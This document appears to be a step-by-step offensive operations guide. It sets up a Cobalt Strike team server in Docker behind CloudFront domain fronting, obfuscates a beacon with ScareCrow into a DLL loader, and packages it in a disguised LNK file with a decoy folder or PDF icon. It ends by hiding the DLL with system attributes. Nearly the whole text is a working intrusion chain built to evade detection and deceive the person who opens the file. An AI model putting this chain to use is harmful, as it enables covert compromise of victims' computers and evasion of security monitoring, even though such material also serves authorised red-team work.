Clone the repo and build the container

git clone
cd cobalt-strike-docker
docker build -t cobalt-strike .

Docker compose snipped

    image: cobalt-strike
    container_name: cobalt-strike
    restart: unless-stopped
        ipv6_address: fd00:bbbb::10:2:2:29
      - "8080"    
      - "8443"
      - "50050"
      - VIRTUAL_EXPOSE=false
      - ./../cobalt-strike:/data

Allow CS clients from specific IPs to the client port 50050, example nftables in prerouting, add forward rule if needed

define CS_IP =
ip saddr <allowed IP> ip daddr <CS server public IP> tcp dport 50050 dnat ip to $CS_IP
ip saddr <aws cloudfront IP> ip daddr <CS server public IP> tcp dport { 8080, 8443 } dnat ip to $CS_IP

Setup Cloudfront domain fronting link 1 link 2

Choose which headers to include in the cache key. All for All to forward everything to origin CS server

Download ScareCrow and install dependencies

ScareCrow_4.11_linux_amd64 ScareCrow
chmod +x ScareCrow
apt install openssl osslsigncode mingw-w64 golang-go
go install   

Create CS listener

Cobalt Strike listener

Generate raw beacon with the listener

Obfuscate with ScareCrow

./ScareCrow -I beacon.bin -Loader dll -domain

Create LNK file with Macro Pack for example

echo '"c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer"' | .\macro_pack.exe -G photo.lnk

Edit LNK file, change icon and target

"C:\Windows\System32\cmd.exe" /c start c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer & C:\Windows\explorer.exe

This will run the beacon and open for example explorer if the icon is a folder, play with it (pdf icon, open legit pdf file…)

Make the DLL file a bit more obfuscated by adding Hidden, Read-Only, System attributes to it

attrib +h +r +s /s dpapi.dll